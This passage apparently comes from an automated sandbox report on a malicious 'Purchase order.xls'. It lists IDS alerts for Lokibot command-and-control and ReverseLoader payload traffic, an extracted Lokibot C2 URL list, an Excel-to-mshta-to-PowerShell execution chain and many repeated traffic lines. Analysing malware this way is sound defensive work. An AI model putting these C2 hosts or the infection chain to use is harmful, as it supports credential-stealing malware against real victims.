2024-10-25T19:52:19.696573+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-25T19:52:20.864617+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-25T19:52:21.996703+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-25T19:52:23.143979+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-25T19:52:24.540108+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-25T19:52:25.739974+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-25T19:52:26.830845+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49205	94.156.177.220	80	TCP
2024-10-25T19:52:27.960200+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49206	94.156.177.220	80	TCP
2024-10-25T19:52:29.089465+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49207	94.156.177.220	80	TCP
2024-10-25T19:52:30.239136+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49208	94.156.177.220	80	TCP
2024-10-25T19:52:31.348968+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49209	94.156.177.220	80	TCP
2024-10-25T19:52:32.440484+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49210	94.156.177.220	80	TCP
2024-10-25T19:52:33.550208+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49211	94.156.177.220	80	TCP
2024-10-25T19:52:34.679063+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49212	94.156.177.220	80	TCP
2024-10-25T19:52:36.585142+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49213	94.156.177.220	80	TCP

ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T19:50:44.185312+0200	2858295	1	A Network Trojan was detected	192.3.176.141	80	192.168.2.22	49175	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T19:51:09.880866+0200	2858795	1	A Network Trojan was detected	192.168.2.22	49170	192.3.176.141	80	TCP
2024-10-25T19:51:14.806501+0200	2858795	1	A Network Trojan was detected	192.168.2.22	49172	192.3.176.141	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.220/simple/five/fre.php"]}

Multi AV Scanner detection for submitted file

Source: Purchase order.xls

ReversingLabs: Detection: 15%

Machine Learning detection for sample

Source: Purchase order.xls

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49169 version: TLS 1.2

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.pdb source: powershell.exe, 0000000C.00000002.498611259.000000000250E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.pdbhP source: powershell.exe, 0000000C.00000002.498611259.000000000287C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: aspnet_regbrowsers.pdb source: aspnet_regbrowsers.exe, aspnet_regbrowsers.exe, 0000001A.00000002.666825665.0000000001272000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: aspnet_regbrowsers.pdbl source: aspnet_regbrowsers.exe, 0000001A.00000002.666825665.0000000001272000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.pdb source: powershell.exe, 00000005.00000002.511869443.0000000002282000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.pdbhP source: powershell.exe, 00000005.00000002.511869443.0000000002282000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Code function: 26_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

26_2_00403D74

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic	DNS query: name: qrisni.me
Source: global traffic	DNS query: name: qrisni.me
Source: global traffic	DNS query: name: qrisni.me
Source: global traffic	DNS query: name: qrisni.me
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.usercontent.google.com

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.186.46:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
